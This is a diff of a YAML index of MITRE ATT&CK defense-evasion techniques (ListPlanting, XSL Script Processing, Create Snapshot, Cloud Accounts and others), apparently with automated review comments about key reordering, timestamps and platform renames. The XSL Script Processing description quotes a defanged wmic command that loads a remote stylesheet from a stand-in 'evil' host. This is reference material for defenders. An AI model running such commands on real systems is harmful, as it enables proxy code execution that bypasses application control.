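Review bot: the rewritten TCC description switches to `description: |+`, which keeps the trailing blank line before `kill_chain_phases` as part of the string, so the value now ends in two newlines while every other description in this file uses `|-` or a quoted scalar that strips them; use `|-` here unless a consumer depends on the trailing newlines. The phrase 'an overwrites file (if connected to an MDM)' in the new text reads like a typo; check it against the upstream wording before editing, since descriptions are imported verbatim.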
@@ -13086,6 +13374,8 @@ defense-evasion:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -13093,7 +13383,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -13123,7 +13413,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -13169,7 +13458,7 @@ defense-evasion:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
@@ -13214,8 +13503,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.007:
technique:
@@ -13260,7 +13547,7 @@ defense-evasion:
To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-08-23T18:32:46.899Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Obfuscated Files or Information: Dynamic API Resolution'
x_mitre_detection: ''
@@ -13274,58 +13561,28 @@ defense-evasion:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.007
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
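Review bot: the description now cites `(Citation: Hexacorn Listplanting)` while this hunk deletes the technique's whole `external_references` block (Microsoft List View Controls, Modexp Windows Process Injection, ESET InvisiMole June 2020). Every citation key in the description must resolve to a `source_name` in the re-emitted references, so check that all four keys (the three removed here plus the new Hexacorn one) appear in the block that replaces it; a missing key renders as a dangling '(Citation: ...)' in downstream markdown. The rewrap of the quoted scalar also shifts existing words across lines for no semantic change; a stable wrap width in the generator would avoid that noise.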
@@ -13342,6 +13599,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -13356,21 +13616,52 @@ defense-evasion:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -13415,9 +13706,8 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
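Review bot: T1484 drops the `Azure AD` and `SaaS` platforms for a single `Identity Provider` entry (with `x_mitre_version` 3.0 to 3.1). Anything keyed on platform names, such as per-platform index files or consumers filtering this file on `Azure AD`, will stop returning T1484, so make sure the platform-specific indexes are regenerated in the same change and call the platform consolidation out in the commit message.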
@@ -13474,8 +13764,8 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -13484,57 +13774,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1220:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Avneet Singh
- - Casey Smith
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
- created: '2018-10-17T00:14:20.652Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1220
- url: https://attack.mitre.org/techniques/T1220
- - source_name: Reaqta MSXSL Spearphishing MAR 2018
- url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
- description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
- MSXSL. Retrieved July 3, 2018.
- - source_name: Twitter SquiblyTwo Detection APR 2018
- url: https://twitter.com/dez_/status/986614411711442944
- description: Desimone, J. (2018, April 18). Status Update. Retrieved July
- 3, 2018.
- - source_name: LOLBAS Wmic
- url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
- description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
- - source_name: Microsoft msxsl.exe
- url: https://www.microsoft.com/download/details.aspx?id=21714
- description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
- Retrieved July 3, 2018.
- - source_name: Penetration Testing Lab MSXSL July 2017
- url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
- description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
- July 3, 2018.
- - source_name: XSL Bypass Mar 2019
- url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
- description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
- Proxy Code Execution. Retrieved August 2, 2019.
- - source_name: Microsoft XSLT Script Mar 2017
- url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
- description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
- Using . Retrieved July 3, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:12.337Z'
+ name: XSL Script Processing
description: |-
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
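Review bot: the removed reference for `Microsoft XSLT Script Mar 2017` reads 'XSLT Stylesheet Scripting Using . Retrieved July 3, 2018.', i.e. the element name after 'Using' is missing from the title. Since this block is deleted and re-emitted later, check that the new entry carries the complete title rather than propagating the gap. As with the other techniques in this diff, the block is rewritten only to reorder keys; a fixed key order in the generator would reduce this to the `modified` and URL changes.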
@@ -13552,29 +13796,73 @@ defense-evasion:
* Local File: wmic process list /FORMAT:evil[.]xsl
* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XSL Script Processing
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Avneet Singh
+ - Casey Smith
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
- kill_chain_phases:
- - phase_name: defense-evasion
- kill_chain_name: mitre-attack
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- x_mitre_system_requirements:
- - Microsoft Core XML Services (MSXML) or access to wmic.exe
x_mitre_defense_bypassed:
- Anti-virus
- Digital Certificate Validation
- Application Control
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_system_requirements:
+ - Microsoft Core XML Services (MSXML) or access to wmic.exe
+ type: attack-pattern
+ id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+ created: '2018-10-17T00:14:20.652Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1220
+ external_id: T1220
+ - source_name: Reaqta MSXSL Spearphishing MAR 2018
+ description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+ MSXSL. Retrieved July 3, 2018.
+ url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+ - source_name: Twitter SquiblyTwo Detection APR 2018
+ description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+ 12, 2024.
+ url: https://x.com/dez_/status/986614411711442944
+ - source_name: LOLBAS Wmic
+ description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+ - source_name: Microsoft msxsl.exe
+ description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+ Retrieved July 3, 2018.
+ url: https://www.microsoft.com/download/details.aspx?id=21714
+ - source_name: Penetration Testing Lab MSXSL July 2017
+ description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+ July 3, 2018.
+ url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+ - source_name: XSL Bypass Mar 2019
+ description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+ Proxy Code Execution. Retrieved August 2, 2019.
+ url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+ - source_name: Microsoft XSLT Script Mar 2017
+ description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+ Using . Retrieved July 3, 2018.
+ url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1220
atomic_tests: []
T1564.001:
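Review bot: almost all of this hunk is key-order churn rather than content change. `kill_chain_phases`, `x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_domains`, `x_mitre_platforms`, `type`, `id`, `created`, `created_by_ref`, `revoked` and the whole `external_references` list are deleted from one position and re-added in another, which turns the handful of real edits (the new `modified` stamp, `x_mitre_attack_spec_version: 2.1.0` to `3.2.0`, the `twitter.com` to `x.com` URL with its new retrieval date, and dropping `spec_version: '2.1'`) into a 29-line-out, 73-line-in diff. Have the generator emit keys in a fixed order (sorted, or the order of the source object) so that future regenerations diff only on substance; the same reordering recurs in the `T1578.001` and `T1078.004` hunks below, where `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are added near the top of the object and deleted from the bottom.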
@@ -13607,7 +13895,7 @@ defense-evasion:
description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
Retrieved July 10, 2017.'
source_name: WireLurker
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T22:32:25.985Z'
name: 'Hide Artifacts: Hidden Files and Directories'
description: |-
Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a
for Windows and ls –a
for Linux and macOS).
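Review bot: `modified` moves backwards here, from `2021-04-29T14:49:39.188Z` to `2020-03-29T22:32:25.985Z`, for an object whose content is otherwise untouched, and the same regression recurs throughout this file (Environmental Keying, Signed Script Proxy Execution, Network Device Authentication, Dylib Hijacking, Downgrade System Image, Trusted Developer Utilities Proxy Execution, MMC, Process Argument Spoofing, COR_PROFILER, Extra Window Memory Injection). The removed stamps are shared across unrelated objects (`2021-04-29T14:49:39.188Z` for both this entry and Downgrade System Image, `2022-05-24T14:00:00.188Z` for XSL Script Processing, Environmental Keying and Trusted Developer Utilities Proxy Execution, `2022-05-11T14:00:00.188Z` for Signed Script Proxy Execution, Network Device Authentication and Process Argument Spoofing), which is the signature of a bundle-wide release timestamp, while the new values are per-object edit times. Together with the file-wide removal of `spec_version: '2.1'` this indicates the generator now reads a different STIX bundle; say so in the PR description, and confirm that nothing downstream uses `modified` to detect changed techniques, because a timestamp that goes backwards will be read as "nothing changed".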
@@ -13635,48 +13923,11 @@ defense-evasion:
- Host forensic analysis
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.001
atomic_tests: []
T1578.001:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
- type: attack-pattern
- created: '2020-06-09T15:33:13.563Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.001
- url: https://attack.mitre.org/techniques/T1578/001
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS Cloud Trail Backup API
- url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
- description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
- Retrieved April 27, 2020.
- - source_name: Azure - Monitor Logs
- url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
- description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
- Retrieved May 1, 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- - source_name: GCP - Creating and Starting a VM
- url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
- description: Google. (2020, April 23). Creating and Starting a VM instance.
- Retrieved May 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:53:44.870Z'
name: Create Snapshot
description: |-
An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
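Review bot: for `T1564.001` this hunk deletes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` and adds nothing back, whereas the neighbouring objects (`T1220` above, `T1578.001` below) keep `x_mitre_attack_spec_version` and have it re-emitted as `3.2.0`. If the new source object simply lacks the field, any consumer that reads `x_mitre_attack_spec_version` per technique now finds it missing for a subset of entries; either have the generator emit a default or confirm every reader tolerates its absence. The same silent drop happens later in this file for Network Device Authentication, Downgrade System Image, Process Argument Spoofing, COR_PROFILER and Extra Window Memory Injection.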
@@ -13685,6 +13936,9 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
@@ -13693,20 +13947,51 @@ defense-evasion:
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create
command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the "sourceSnapshot":
parameter pointed to "global/snapshots/[BOOT_SNAPSHOT_NAME]
.(Citation: GCP - Creating and Starting a VM)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Snapshot: Snapshot Creation'
- 'Snapshot: Snapshot Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+ created: '2020-06-09T15:33:13.563Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/001
+ external_id: T1578.001
+ - source_name: AWS Cloud Trail Backup API
+ description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+ Retrieved April 27, 2020.
+ url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+ - source_name: GCP - Creating and Starting a VM
+ description: Google. (2020, April 23). Creating and Starting a VM instance.
+ Retrieved May 1, 2020.
+ url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure - Monitor Logs
+ description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+ Retrieved May 1, 2020.
+ url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
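Review bot: beyond the reordering, this hunk removes `x_mitre_permissions_required: - User` from `T1578.001` with no replacement and changes the `Mandiant M-Trends 2020` URL from `https://content.fireeye.com/m-trends/rpt-m-trends-2020` to `https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf`. The `x_mitre_version` bump from `1.1` to `1.2` accounts for these as upstream edits, but the dropped permissions field is a data change that anyone filtering this index on required permissions will notice, so call it out in the commit message rather than leaving it buried inside a key-order diff.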
@@ -13763,6 +14048,7 @@ defense-evasion:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -13773,13 +14059,12 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
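Review bot: `x_mitre_platforms` here replaces `Office 365`, `Google Workspace` and `Azure AD` with `Office Suite` and `Identity Provider`, and the same substitution appears below for `T1078.004` (version `1.7` to `1.8`) and `T1556` (version `2.4` to `2.5`). Any index, filter or platform-to-file mapping in this repository keyed on the old platform strings will stop matching these techniques after this regeneration, so those outputs and the mapping in the generator need to change in the same PR, and the rename deserves a line in the PR description since it is an upstream taxonomy change rather than a local edit.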
@@ -13838,11 +14123,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -13882,8 +14166,10 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -13891,13 +14177,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -13928,9 +14214,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests:
- name: Creating GCP Service Account and Service Account Key
@@ -14049,7 +14332,7 @@ defense-evasion:
